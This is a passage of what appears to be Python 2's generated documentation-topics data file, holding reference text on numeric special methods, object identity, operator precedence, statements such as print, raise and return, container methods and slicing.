(In other words, "exec obj" would be illegal, ' 'but\n' '"exec obj in ns" would be legal.)\n' '\n' 'The "eval()", "execfile()", and "input()" functions and the ' '"exec"\n' 'statement do not have access to the full environment for ' 'resolving\n' 'names. Names may be resolved in the local and global namespaces ' 'of\n' 'the caller. Free variables are not resolved in the nearest ' 'enclosing\n' 'namespace, but in the global namespace. [1] The "exec" statement ' 'and\n' 'the "eval()" and "execfile()" functions have optional arguments ' 'to\n' 'override the global and local namespace. If only one namespace ' 'is\n' 'specified, it is used for both.\n', 'numbers': '\n' 'Numeric literals\n' '****************\n' '\n' 'There are four types of numeric literals: plain integers, long\n' 'integers, floating point numbers, and imaginary numbers. There ' 'are no\n' 'complex literals (complex numbers can be formed by adding a real\n' 'number and an imaginary number).\n' '\n' 'Note that numeric literals do not include a sign; a phrase like ' '"-1"\n' 'is actually an expression composed of the unary operator \'"-"\' ' 'and the\n' 'literal "1".\n', 'numeric-types': '\n' 'Emulating numeric types\n' '***********************\n' '\n' 'The following methods can be defined to emulate numeric ' 'objects.\n' 'Methods corresponding to operations that are not supported ' 'by the\n' 'particular kind of number implemented (e.g., bitwise ' 'operations for\n' 'non-integral numbers) should be left undefined.\n' '\n' 'object.__add__(self, other)\n' 'object.__sub__(self, other)\n' 'object.__mul__(self, other)\n' 'object.__floordiv__(self, other)\n' 'object.__mod__(self, other)\n' 'object.__divmod__(self, other)\n' 'object.__pow__(self, other[, modulo])\n' 'object.__lshift__(self, other)\n' 'object.__rshift__(self, other)\n' 'object.__and__(self, other)\n' 'object.__xor__(self, other)\n' 'object.__or__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' 
operations ("+", "-", "*", "//", "%", "divmod()", ' '"pow()", "**",\n' ' "<<", ">>", "&", "^", "|"). For instance, to evaluate ' 'the\n' ' expression "x + y", where *x* is an instance of a class ' 'that has an\n' ' "__add__()" method, "x.__add__(y)" is called. The ' '"__divmod__()"\n' ' method should be the equivalent to using ' '"__floordiv__()" and\n' ' "__mod__()"; it should not be related to "__truediv__()" ' '(described\n' ' below). Note that "__pow__()" should be defined to ' 'accept an\n' ' optional third argument if the ternary version of the ' 'built-in\n' ' "pow()" function is to be supported.\n' '\n' ' If one of those methods does not support the operation ' 'with the\n' ' supplied arguments, it should return "NotImplemented".\n' '\n' 'object.__div__(self, other)\n' 'object.__truediv__(self, other)\n' '\n' ' The division operator ("/") is implemented by these ' 'methods. The\n' ' "__truediv__()" method is used when ' '"__future__.division" is in\n' ' effect, otherwise "__div__()" is used. 
If only one of ' 'these two\n' ' methods is defined, the object will not support division ' 'in the\n' ' alternate context; "TypeError" will be raised instead.\n' '\n' 'object.__radd__(self, other)\n' 'object.__rsub__(self, other)\n' 'object.__rmul__(self, other)\n' 'object.__rdiv__(self, other)\n' 'object.__rtruediv__(self, other)\n' 'object.__rfloordiv__(self, other)\n' 'object.__rmod__(self, other)\n' 'object.__rdivmod__(self, other)\n' 'object.__rpow__(self, other)\n' 'object.__rlshift__(self, other)\n' 'object.__rrshift__(self, other)\n' 'object.__rand__(self, other)\n' 'object.__rxor__(self, other)\n' 'object.__ror__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' operations ("+", "-", "*", "/", "%", "divmod()", ' '"pow()", "**",\n' ' "<<", ">>", "&", "^", "|") with reflected (swapped) ' 'operands.\n' ' These functions are only called if the left operand does ' 'not\n' ' support the corresponding operation and the operands are ' 'of\n' ' different types. [2] For instance, to evaluate the ' 'expression "x -\n' ' y", where *y* is an instance of a class that has an ' '"__rsub__()"\n' ' method, "y.__rsub__(x)" is called if "x.__sub__(y)" ' 'returns\n' ' *NotImplemented*.\n' '\n' ' Note that ternary "pow()" will not try calling ' '"__rpow__()" (the\n' ' coercion rules would become too complicated).\n' '\n' " Note: If the right operand's type is a subclass of the " 'left\n' " operand's type and that subclass provides the " 'reflected method\n' ' for the operation, this method will be called before ' 'the left\n' " operand's non-reflected method. 
This behavior allows " 'subclasses\n' " to override their ancestors' operations.\n" '\n' 'object.__iadd__(self, other)\n' 'object.__isub__(self, other)\n' 'object.__imul__(self, other)\n' 'object.__idiv__(self, other)\n' 'object.__itruediv__(self, other)\n' 'object.__ifloordiv__(self, other)\n' 'object.__imod__(self, other)\n' 'object.__ipow__(self, other[, modulo])\n' 'object.__ilshift__(self, other)\n' 'object.__irshift__(self, other)\n' 'object.__iand__(self, other)\n' 'object.__ixor__(self, other)\n' 'object.__ior__(self, other)\n' '\n' ' These methods are called to implement the augmented ' 'arithmetic\n' ' assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", ' '"<<=",\n' ' ">>=", "&=", "^=", "|="). These methods should attempt ' 'to do the\n' ' operation in-place (modifying *self*) and return the ' 'result (which\n' ' could be, but does not have to be, *self*). If a ' 'specific method\n' ' is not defined, the augmented assignment falls back to ' 'the normal\n' ' methods. For instance, to execute the statement "x += ' 'y", where\n' ' *x* is an instance of a class that has an "__iadd__()" ' 'method,\n' ' "x.__iadd__(y)" is called. If *x* is an instance of a ' 'class that\n' ' does not define a "__iadd__()" method, "x.__add__(y)" ' 'and\n' ' "y.__radd__(x)" are considered, as with the evaluation ' 'of "x + y".\n' '\n' 'object.__neg__(self)\n' 'object.__pos__(self)\n' 'object.__abs__(self)\n' 'object.__invert__(self)\n' '\n' ' Called to implement the unary arithmetic operations ' '("-", "+",\n' ' "abs()" and "~").\n' '\n' 'object.__complex__(self)\n' 'object.__int__(self)\n' 'object.__long__(self)\n' 'object.__float__(self)\n' '\n' ' Called to implement the built-in functions "complex()", ' '"int()",\n' ' "long()", and "float()". 
Should return a value of the ' 'appropriate\n' ' type.\n' '\n' 'object.__oct__(self)\n' 'object.__hex__(self)\n' '\n' ' Called to implement the built-in functions "oct()" and ' '"hex()".\n' ' Should return a string value.\n' '\n' 'object.__index__(self)\n' '\n' ' Called to implement "operator.index()". Also called ' 'whenever\n' ' Python needs an integer object (such as in slicing). ' 'Must return\n' ' an integer (int or long).\n' '\n' ' New in version 2.5.\n' '\n' 'object.__coerce__(self, other)\n' '\n' ' Called to implement "mixed-mode" numeric arithmetic. ' 'Should either\n' ' return a 2-tuple containing *self* and *other* converted ' 'to a\n' ' common numeric type, or "None" if conversion is ' 'impossible. When\n' ' the common type would be the type of "other", it is ' 'sufficient to\n' ' return "None", since the interpreter will also ask the ' 'other object\n' ' to attempt a coercion (but sometimes, if the ' 'implementation of the\n' ' other type cannot be changed, it is useful to do the ' 'conversion to\n' ' the other type here). A return value of ' '"NotImplemented" is\n' ' equivalent to returning "None".\n', 'objects': '\n' 'Objects, values and types\n' '*************************\n' '\n' "*Objects* are Python's abstraction for data. All data in a " 'Python\n' 'program is represented by objects or by relations between ' 'objects. (In\n' 'a sense, and in conformance to Von Neumann\'s model of a "stored\n' 'program computer," code is also represented by objects.)\n' '\n' "Every object has an identity, a type and a value. An object's\n" '*identity* never changes once it has been created; you may think ' 'of it\n' 'as the object\'s address in memory. The \'"is"\' operator ' 'compares the\n' 'identity of two objects; the "id()" function returns an integer\n' 'representing its identity (currently implemented as its address). ' 'An\n' "object's *type* is also unchangeable. 
[1] An object's type " 'determines\n' 'the operations that the object supports (e.g., "does it have a\n' 'length?") and also defines the possible values for objects of ' 'that\n' 'type. The "type()" function returns an object\'s type (which is ' 'an\n' 'object itself). The *value* of some objects can change. ' 'Objects\n' 'whose value can change are said to be *mutable*; objects whose ' 'value\n' 'is unchangeable once they are created are called *immutable*. ' '(The\n' 'value of an immutable container object that contains a reference ' 'to a\n' "mutable object can change when the latter's value is changed; " 'however\n' 'the container is still considered immutable, because the ' 'collection of\n' 'objects it contains cannot be changed. So, immutability is not\n' 'strictly the same as having an unchangeable value, it is more ' 'subtle.)\n' "An object's mutability is determined by its type; for instance,\n" 'numbers, strings and tuples are immutable, while dictionaries ' 'and\n' 'lists are mutable.\n' '\n' 'Objects are never explicitly destroyed; however, when they ' 'become\n' 'unreachable they may be garbage-collected. An implementation is\n' 'allowed to postpone garbage collection or omit it altogether --- ' 'it is\n' 'a matter of implementation quality how garbage collection is\n' 'implemented, as long as no objects are collected that are still\n' 'reachable.\n' '\n' '**CPython implementation detail:** CPython currently uses a ' 'reference-\n' 'counting scheme with (optional) delayed detection of cyclically ' 'linked\n' 'garbage, which collects most objects as soon as they become\n' 'unreachable, but is not guaranteed to collect garbage containing\n' 'circular references. See the documentation of the "gc" module ' 'for\n' 'information on controlling the collection of cyclic garbage. ' 'Other\n' 'implementations act differently and CPython may change. 
Do not ' 'depend\n' 'on immediate finalization of objects when they become unreachable ' '(ex:\n' 'always close files).\n' '\n' "Note that the use of the implementation's tracing or debugging\n" 'facilities may keep objects alive that would normally be ' 'collectable.\n' 'Also note that catching an exception with a \'"try"..."except"\'\n' 'statement may keep objects alive.\n' '\n' 'Some objects contain references to "external" resources such as ' 'open\n' 'files or windows. It is understood that these resources are ' 'freed\n' 'when the object is garbage-collected, but since garbage ' 'collection is\n' 'not guaranteed to happen, such objects also provide an explicit ' 'way to\n' 'release the external resource, usually a "close()" method. ' 'Programs\n' 'are strongly recommended to explicitly close such objects. The\n' '\'"try"..."finally"\' statement provides a convenient way to do ' 'this.\n' '\n' 'Some objects contain references to other objects; these are ' 'called\n' '*containers*. Examples of containers are tuples, lists and\n' "dictionaries. The references are part of a container's value. " 'In\n' 'most cases, when we talk about the value of a container, we imply ' 'the\n' 'values, not the identities of the contained objects; however, ' 'when we\n' 'talk about the mutability of a container, only the identities of ' 'the\n' 'immediately contained objects are implied. So, if an immutable\n' 'container (like a tuple) contains a reference to a mutable ' 'object, its\n' 'value changes if that mutable object is changed.\n' '\n' 'Types affect almost all aspects of object behavior. Even the\n' 'importance of object identity is affected in some sense: for ' 'immutable\n' 'types, operations that compute new values may actually return a\n' 'reference to any existing object with the same type and value, ' 'while\n' 'for mutable objects this is not allowed. 
E.g., after "a = 1; b = ' '1",\n' '"a" and "b" may or may not refer to the same object with the ' 'value\n' 'one, depending on the implementation, but after "c = []; d = []", ' '"c"\n' 'and "d" are guaranteed to refer to two different, unique, newly\n' 'created empty lists. (Note that "c = d = []" assigns the same ' 'object\n' 'to both "c" and "d".)\n', 'operator-summary': '\n' 'Operator precedence\n' '*******************\n' '\n' 'The following table summarizes the operator precedences ' 'in Python,\n' 'from lowest precedence (least binding) to highest ' 'precedence (most\n' 'binding). Operators in the same box have the same ' 'precedence. Unless\n' 'the syntax is explicitly given, operators are binary. ' 'Operators in\n' 'the same box group left to right (except for ' 'comparisons, including\n' 'tests, which all have the same precedence and chain from ' 'left to right\n' '--- see section Comparisons --- and exponentiation, ' 'which groups from\n' 'right to left).\n' '\n' '+-------------------------------------------------+---------------------------------------+\n' '| Operator | ' 'Description |\n' '+=================================================+=======================================+\n' '| "lambda" | ' 'Lambda expression |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "if" -- "else" | ' 'Conditional expression |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "or" | ' 'Boolean OR |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "and" | ' 'Boolean AND |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "not" "x" | ' 'Boolean NOT |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "in", "not in", "is", "is not", "<", "<=", ">", | ' 'Comparisons, including membership |\n' '| ">=", "<>", "!=", "==" 
| ' 'tests and identity tests |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "|" | ' 'Bitwise OR |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "^" | ' 'Bitwise XOR |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "&" | ' 'Bitwise AND |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "<<", ">>" | ' 'Shifts |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "+", "-" | ' 'Addition and subtraction |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "*", "/", "//", "%" | ' 'Multiplication, division, remainder |\n' '| | ' '[8] |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "+x", "-x", "~x" | ' 'Positive, negative, bitwise NOT |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "**" | ' 'Exponentiation [9] |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "x[index]", "x[index:index]", | ' 'Subscription, slicing, call, |\n' '| "x(arguments...)", "x.attribute" | ' 'attribute reference |\n' '+-------------------------------------------------+---------------------------------------+\n' '| "(expressions...)", "[expressions...]", "{key: | ' 'Binding or tuple display, list |\n' '| value...}", "`expressions...`" | ' 'display, dictionary display, string |\n' '| | ' 'conversion |\n' '+-------------------------------------------------+---------------------------------------+\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] In Python 2.3 and later releases, a list ' 'comprehension "leaks"\n' ' the control variables of each "for" it contains into ' 'the\n' ' containing scope. 
However, this behavior is ' 'deprecated, and\n' ' relying on it will not work in Python 3.\n' '\n' '[2] While "abs(x%y) < abs(y)" is true mathematically, ' 'for floats\n' ' it may not be true numerically due to roundoff. For ' 'example, and\n' ' assuming a platform on which a Python float is an ' 'IEEE 754 double-\n' ' precision number, in order that "-1e-100 % 1e100" ' 'have the same\n' ' sign as "1e100", the computed result is "-1e-100 + ' '1e100", which\n' ' is numerically exactly equal to "1e100". The ' 'function\n' ' "math.fmod()" returns a result whose sign matches ' 'the sign of the\n' ' first argument instead, and so returns "-1e-100" in ' 'this case.\n' ' Which approach is more appropriate depends on the ' 'application.\n' '\n' '[3] If x is very close to an exact integer multiple of ' "y, it's\n" ' possible for "floor(x/y)" to be one larger than ' '"(x-x%y)/y" due to\n' ' rounding. In such cases, Python returns the latter ' 'result, in\n' ' order to preserve that "divmod(x,y)[0] * y + x % y" ' 'be very close\n' ' to "x".\n' '\n' '[4] While comparisons between unicode strings make sense ' 'at the\n' ' byte level, they may be counter-intuitive to users. ' 'For example,\n' ' the strings "u"\\u00C7"" and "u"\\u0043\\u0327"" ' 'compare differently,\n' ' even though they both represent the same unicode ' 'character (LATIN\n' ' CAPITAL LETTER C WITH CEDILLA). To compare strings ' 'in a human\n' ' recognizable way, compare using ' '"unicodedata.normalize()".\n' '\n' '[5] The implementation computes this efficiently, ' 'without\n' ' constructing lists or sorting.\n' '\n' '[6] Earlier versions of Python used lexicographic ' 'comparison of\n' ' the sorted (key, value) lists, but this was very ' 'expensive for the\n' ' common case of comparing for equality. 
An even ' 'earlier version of\n' ' Python compared dictionaries by identity only, but ' 'this caused\n' ' surprises because people expected to be able to test ' 'a dictionary\n' ' for emptiness by comparing it to "{}".\n' '\n' '[7] Due to automatic garbage-collection, free lists, and ' 'the\n' ' dynamic nature of descriptors, you may notice ' 'seemingly unusual\n' ' behaviour in certain uses of the "is" operator, like ' 'those\n' ' involving comparisons between instance methods, or ' 'constants.\n' ' Check their documentation for more info.\n' '\n' '[8] The "%" operator is also used for string formatting; ' 'the same\n' ' precedence applies.\n' '\n' '[9] The power operator "**" binds less tightly than an ' 'arithmetic\n' ' or bitwise unary operator on its right, that is, ' '"2**-1" is "0.5".\n', 'pass': '\n' 'The "pass" statement\n' '********************\n' '\n' ' pass_stmt ::= "pass"\n' '\n' '"pass" is a null operation --- when it is executed, nothing ' 'happens.\n' 'It is useful as a placeholder when a statement is required\n' 'syntactically, but no code needs to be executed, for example:\n' '\n' ' def f(arg): pass # a function that does nothing (yet)\n' '\n' ' class C: pass # a class with no methods (yet)\n', 'power': '\n' 'The power operator\n' '******************\n' '\n' 'The power operator binds more tightly than unary operators on its\n' 'left; it binds less tightly than unary operators on its right. ' 'The\n' 'syntax is:\n' '\n' ' power ::= primary ["**" u_expr]\n' '\n' 'Thus, in an unparenthesized sequence of power and unary operators, ' 'the\n' 'operators are evaluated from right to left (this does not ' 'constrain\n' 'the evaluation order for the operands): "-1**2" results in "-1".\n' '\n' 'The power operator has the same semantics as the built-in "pow()"\n' 'function, when called with two arguments: it yields its left ' 'argument\n' 'raised to the power of its right argument. The numeric arguments ' 'are\n' 'first converted to a common type. 
The result type is that of the\n' 'arguments after coercion.\n' '\n' 'With mixed operand types, the coercion rules for binary arithmetic\n' 'operators apply. For int and long int operands, the result has the\n' 'same type as the operands (after coercion) unless the second ' 'argument\n' 'is negative; in that case, all arguments are converted to float and ' 'a\n' 'float result is delivered. For example, "10**2" returns "100", but\n' '"10**-2" returns "0.01". (This last feature was added in Python ' '2.2.\n' 'In Python 2.1 and before, if both arguments were of integer types ' 'and\n' 'the second argument was negative, an exception was raised).\n' '\n' 'Raising "0.0" to a negative power results in a ' '"ZeroDivisionError".\n' 'Raising a negative number to a fractional power results in a\n' '"ValueError".\n', 'print': '\n' 'The "print" statement\n' '*********************\n' '\n' ' print_stmt ::= "print" ([expression ("," expression)* [","]]\n' ' | ">>" expression [("," expression)+ [","]])\n' '\n' '"print" evaluates each expression in turn and writes the resulting\n' 'object to standard output (see below). If an object is not a ' 'string,\n' 'it is first converted to a string using the rules for string\n' 'conversions. The (resulting or original) string is then written. ' 'A\n' 'space is written before each object is (converted and) written, ' 'unless\n' 'the output system believes it is positioned at the beginning of a\n' 'line. This is the case (1) when no characters have yet been ' 'written\n' 'to standard output, (2) when the last character written to ' 'standard\n' 'output is a whitespace character except "\' \'", or (3) when the ' 'last\n' 'write operation on standard output was not a "print" statement. 
' '(In\n' 'some cases it may be functional to write an empty string to ' 'standard\n' 'output for this reason.)\n' '\n' 'Note: Objects which act like file objects but which are not the\n' ' built-in file objects often do not properly emulate this aspect ' 'of\n' " the file object's behavior, so it is best not to rely on this.\n" '\n' 'A "\'\\n\'" character is written at the end, unless the "print" ' 'statement\n' 'ends with a comma. This is the only action if the statement ' 'contains\n' 'just the keyword "print".\n' '\n' 'Standard output is defined as the file object named "stdout" in ' 'the\n' 'built-in module "sys". If no such object exists, or if it does ' 'not\n' 'have a "write()" method, a "RuntimeError" exception is raised.\n' '\n' '"print" also has an extended form, defined by the second portion ' 'of\n' 'the syntax described above. This form is sometimes referred to as\n' '""print" chevron." In this form, the first expression after the ' '">>"\n' 'must evaluate to a "file-like" object, specifically an object that ' 'has\n' 'a "write()" method as described above. With this extended form, ' 'the\n' 'subsequent expressions are printed to this file object. If the ' 'first\n' 'expression evaluates to "None", then "sys.stdout" is used as the ' 'file\n' 'for output.\n', 'raise': '\n' 'The "raise" statement\n' '*********************\n' '\n' ' raise_stmt ::= "raise" [expression ["," expression ["," ' 'expression]]]\n' '\n' 'If no expressions are present, "raise" re-raises the last ' 'exception\n' 'that was active in the current scope. If no exception is active ' 'in\n' 'the current scope, a "TypeError" exception is raised indicating ' 'that\n' 'this is an error (if running under IDLE, a "Queue.Empty" exception ' 'is\n' 'raised instead).\n' '\n' 'Otherwise, "raise" evaluates the expressions to get three objects,\n' 'using "None" as the value of omitted expressions. 
The first two\n' 'objects are used to determine the *type* and *value* of the ' 'exception.\n' '\n' 'If the first object is an instance, the type of the exception is ' 'the\n' 'class of the instance, the instance itself is the value, and the\n' 'second object must be "None".\n' '\n' 'If the first object is a class, it becomes the type of the ' 'exception.\n' 'The second object is used to determine the exception value: If it ' 'is\n' 'an instance of the class, the instance becomes the exception value. ' 'If\n' 'the second object is a tuple, it is used as the argument list for ' 'the\n' 'class constructor; if it is "None", an empty argument list is ' 'used,\n' 'and any other object is treated as a single argument to the\n' 'constructor. The instance so created by calling the constructor ' 'is\n' 'used as the exception value.\n' '\n' 'If a third object is present and not "None", it must be a ' 'traceback\n' 'object (see section The standard type hierarchy), and it is\n' 'substituted instead of the current location as the place where the\n' 'exception occurred. If the third object is present and not a\n' 'traceback object or "None", a "TypeError" exception is raised. 
' 'The\n' 'three-expression form of "raise" is useful to re-raise an ' 'exception\n' 'transparently in an except clause, but "raise" with no expressions\n' 'should be preferred if the exception to be re-raised was the most\n' 'recently active exception in the current scope.\n' '\n' 'Additional information on exceptions can be found in section\n' 'Exceptions, and information about handling exceptions is in ' 'section\n' 'The try statement.\n', 'return': '\n' 'The "return" statement\n' '**********************\n' '\n' ' return_stmt ::= "return" [expression_list]\n' '\n' '"return" may only occur syntactically nested in a function ' 'definition,\n' 'not within a nested class definition.\n' '\n' 'If an expression list is present, it is evaluated, else "None" is\n' 'substituted.\n' '\n' '"return" leaves the current function call with the expression list ' '(or\n' '"None") as return value.\n' '\n' 'When "return" passes control out of a "try" statement with a ' '"finally"\n' 'clause, that "finally" clause is executed before really leaving ' 'the\n' 'function.\n' '\n' 'In a generator function, the "return" statement is not allowed to\n' 'include an "expression_list". In that context, a bare "return"\n' 'indicates that the generator is done and will cause ' '"StopIteration" to\n' 'be raised.\n', 'sequence-types': '\n' 'Emulating container types\n' '*************************\n' '\n' 'The following methods can be defined to implement ' 'container objects.\n' 'Containers usually are sequences (such as lists or tuples) ' 'or mappings\n' '(like dictionaries), but can represent other containers as ' 'well. The\n' 'first set of methods is used either to emulate a sequence ' 'or to\n' 'emulate a mapping; the difference is that for a sequence, ' 'the\n' 'allowable keys should be the integers *k* for which "0 <= ' 'k < N" where\n' '*N* is the length of the sequence, or slice objects, which ' 'define a\n' 'range of items. 
(For backwards compatibility, the method\n' '"__getslice__()" (see below) can also be defined to handle ' 'simple, but\n' 'not extended slices.) It is also recommended that mappings ' 'provide the\n' 'methods "keys()", "values()", "items()", "has_key()", ' '"get()",\n' '"clear()", "setdefault()", "iterkeys()", "itervalues()",\n' '"iteritems()", "pop()", "popitem()", "copy()", and ' '"update()" behaving\n' "similar to those for Python's standard dictionary " 'objects. The\n' '"UserDict" module provides a "DictMixin" class to help ' 'create those\n' 'methods from a base set of "__getitem__()", ' '"__setitem__()",\n' '"__delitem__()", and "keys()". Mutable sequences should ' 'provide\n' 'methods "append()", "count()", "index()", "extend()", ' '"insert()",\n' '"pop()", "remove()", "reverse()" and "sort()", like Python ' 'standard\n' 'list objects. Finally, sequence types should implement ' 'addition\n' '(meaning concatenation) and multiplication (meaning ' 'repetition) by\n' 'defining the methods "__add__()", "__radd__()", ' '"__iadd__()",\n' '"__mul__()", "__rmul__()" and "__imul__()" described ' 'below; they\n' 'should not define "__coerce__()" or other numerical ' 'operators. It is\n' 'recommended that both mappings and sequences implement ' 'the\n' '"__contains__()" method to allow efficient use of the "in" ' 'operator;\n' 'for mappings, "in" should be equivalent of "has_key()"; ' 'for sequences,\n' 'it should search through the values. It is further ' 'recommended that\n' 'both mappings and sequences implement the "__iter__()" ' 'method to allow\n' 'efficient iteration through the container; for mappings, ' '"__iter__()"\n' 'should be the same as "iterkeys()"; for sequences, it ' 'should iterate\n' 'through the values.\n' '\n' 'object.__len__(self)\n' '\n' ' Called to implement the built-in function "len()". ' 'Should return\n' ' the length of the object, an integer ">=" 0. 
Also, an ' 'object that\n' ' doesn\'t define a "__nonzero__()" method and whose ' '"__len__()"\n' ' method returns zero is considered to be false in a ' 'Boolean context.\n' '\n' 'object.__getitem__(self, key)\n' '\n' ' Called to implement evaluation of "self[key]". For ' 'sequence types,\n' ' the accepted keys should be integers and slice ' 'objects. Note that\n' ' the special interpretation of negative indexes (if the ' 'class wishes\n' ' to emulate a sequence type) is up to the ' '"__getitem__()" method. If\n' ' *key* is of an inappropriate type, "TypeError" may be ' 'raised; if of\n' ' a value outside the set of indexes for the sequence ' '(after any\n' ' special interpretation of negative values), ' '"IndexError" should be\n' ' raised. For mapping types, if *key* is missing (not in ' 'the\n' ' container), "KeyError" should be raised.\n' '\n' ' Note: "for" loops expect that an "IndexError" will be ' 'raised for\n' ' illegal indexes to allow proper detection of the end ' 'of the\n' ' sequence.\n' '\n' 'object.__missing__(self, key)\n' '\n' ' Called by "dict"."__getitem__()" to implement ' '"self[key]" for dict\n' ' subclasses when key is not in the dictionary.\n' '\n' 'object.__setitem__(self, key, value)\n' '\n' ' Called to implement assignment to "self[key]". Same ' 'note as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support changes to the values for keys, or ' 'if new keys\n' ' can be added, or for sequences if elements can be ' 'replaced. The\n' ' same exceptions should be raised for improper *key* ' 'values as for\n' ' the "__getitem__()" method.\n' '\n' 'object.__delitem__(self, key)\n' '\n' ' Called to implement deletion of "self[key]". Same note ' 'as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support removal of keys, or for sequences ' 'if elements\n' ' can be removed from the sequence. 
The same exceptions ' 'should be\n' ' raised for improper *key* values as for the ' '"__getitem__()" method.\n' '\n' 'object.__iter__(self)\n' '\n' ' This method is called when an iterator is required for ' 'a container.\n' ' This method should return a new iterator object that ' 'can iterate\n' ' over all the objects in the container. For mappings, ' 'it should\n' ' iterate over the keys of the container, and should also ' 'be made\n' ' available as the method "iterkeys()".\n' '\n' ' Iterator objects also need to implement this method; ' 'they are\n' ' required to return themselves. For more information on ' 'iterator\n' ' objects, see Iterator Types.\n' '\n' 'object.__reversed__(self)\n' '\n' ' Called (if present) by the "reversed()" built-in to ' 'implement\n' ' reverse iteration. It should return a new iterator ' 'object that\n' ' iterates over all the objects in the container in ' 'reverse order.\n' '\n' ' If the "__reversed__()" method is not provided, the ' '"reversed()"\n' ' built-in will fall back to using the sequence protocol ' '("__len__()"\n' ' and "__getitem__()"). Objects that support the ' 'sequence protocol\n' ' should only provide "__reversed__()" if they can ' 'provide an\n' ' implementation that is more efficient than the one ' 'provided by\n' ' "reversed()".\n' '\n' ' New in version 2.6.\n' '\n' 'The membership test operators ("in" and "not in") are ' 'normally\n' 'implemented as an iteration through a sequence. However, ' 'container\n' 'objects can supply the following special method with a ' 'more efficient\n' 'implementation, which also does not require the object be ' 'a sequence.\n' '\n' 'object.__contains__(self, item)\n' '\n' ' Called to implement membership test operators. Should ' 'return true\n' ' if *item* is in *self*, false otherwise. 
For mapping ' 'objects, this\n' ' should consider the keys of the mapping rather than the ' 'values or\n' ' the key-item pairs.\n' '\n' ' For objects that don\'t define "__contains__()", the ' 'membership test\n' ' first tries iteration via "__iter__()", then the old ' 'sequence\n' ' iteration protocol via "__getitem__()", see this ' 'section in the\n' ' language reference.\n', 'shifting': '\n' 'Shifting operations\n' '*******************\n' '\n' 'The shifting operations have lower priority than the arithmetic\n' 'operations:\n' '\n' ' shift_expr ::= a_expr | shift_expr ( "<<" | ">>" ) a_expr\n' '\n' 'These operators accept plain or long integers as arguments. ' 'The\n' 'arguments are converted to a common type. They shift the first\n' 'argument to the left or right by the number of bits given by ' 'the\n' 'second argument.\n' '\n' 'A right shift by *n* bits is defined as division by "pow(2, ' 'n)". A\n' 'left shift by *n* bits is defined as multiplication with "pow(2, ' 'n)".\n' 'Negative shift counts raise a "ValueError" exception.\n' '\n' 'Note: In the current implementation, the right-hand operand is\n' ' required to be at most "sys.maxsize". If the right-hand ' 'operand is\n' ' larger than "sys.maxsize" an "OverflowError" exception is ' 'raised.\n', 'slicings': '\n' 'Slicings\n' '********\n' '\n' 'A slicing selects a range of items in a sequence object (e.g., ' 'a\n' 'string, tuple or list). Slicings may be used as expressions or ' 'as\n' 'targets in assignment or "del" statements. 
The syntax for a ' 'slicing:\n' '\n' ' slicing ::= simple_slicing | extended_slicing\n' ' simple_slicing ::= primary "[" short_slice "]"\n' ' extended_slicing ::= primary "[" slice_list "]"\n' ' slice_list ::= slice_item ("," slice_item)* [","]\n' ' slice_item ::= expression | proper_slice | ellipsis\n' ' proper_slice ::= short_slice | long_slice\n' ' short_slice ::= [lower_bound] ":" [upper_bound]\n' ' long_slice ::= short_slice ":" [stride]\n' ' lower_bound ::= expression\n' ' upper_bound ::= expression\n' ' stride ::= expression\n' ' ellipsis ::= "..."\n' '\n' 'There is ambiguity in the formal syntax here: anything that ' 'looks like\n' 'an expression list also looks like a slice list, so any ' 'subscription\n' 'can be interpreted as a slicing. Rather than further ' 'complicating the\n' 'syntax, this is disambiguated by defining that in this case the\n' 'interpretation as a subscription takes priority over the\n' 'interpretation as a slicing (this is the case if the slice list\n' 'contains no proper slice nor ellipses). Similarly, when the ' 'slice\n' 'list has exactly one short slice and no trailing comma, the\n' 'interpretation as a simple slicing takes priority over that as ' 'an\n' 'extended slicing.\n' '\n' 'The semantics for a simple slicing are as follows. The primary ' 'must\n' 'evaluate to a sequence object. The lower and upper bound ' 'expressions,\n' 'if present, must evaluate to plain integers; defaults are zero ' 'and the\n' '"sys.maxint", respectively. If either bound is negative, the\n' "sequence's length is added to it. The slicing now selects all " 'items\n' 'with index *k* such that "i <= k < j" where *i* and *j* are the\n' 'specified lower and upper bounds. This may be an empty ' 'sequence. It\n' 'is not an error if *i* or *j* lie outside the range of valid ' 'indexes\n' "(such items don't exist so they aren't selected).\n" '\n' 'The semantics for an extended slicing are as follows. 
The ' 'primary\n' 'must evaluate to a mapping object, and it is indexed with a key ' 'that\n' 'is constructed from the slice list, as follows. If the slice ' 'list\n' 'contains at least one comma, the key is a tuple containing the\n' 'conversion of the slice items; otherwise, the conversion of the ' 'lone\n' 'slice item is the key. The conversion of a slice item that is ' 'an\n' 'expression is that expression. The conversion of an ellipsis ' 'slice\n' 'item is the built-in "Ellipsis" object. The conversion of a ' 'proper\n' 'slice is a slice object (see section The standard type ' 'hierarchy)\n' 'whose "start", "stop" and "step" attributes are the values of ' 'the\n' 'expressions given as lower bound, upper bound and stride,\n' 'respectively, substituting "None" for missing expressions.\n', 'specialattrs': '\n' 'Special Attributes\n' '******************\n' '\n' 'The implementation adds a few special read-only attributes ' 'to several\n' 'object types, where they are relevant. Some of these are ' 'not reported\n' 'by the "dir()" built-in function.\n' '\n' 'object.__dict__\n' '\n' ' A dictionary or other mapping object used to store an ' "object's\n" ' (writable) attributes.\n' '\n' 'object.__methods__\n' '\n' ' Deprecated since version 2.2: Use the built-in function ' '"dir()" to\n' " get a list of an object's attributes. This attribute is " 'no longer\n' ' available.\n' '\n' 'object.__members__\n' '\n' ' Deprecated since version 2.2: Use the built-in function ' '"dir()" to\n' " get a list of an object's attributes. 
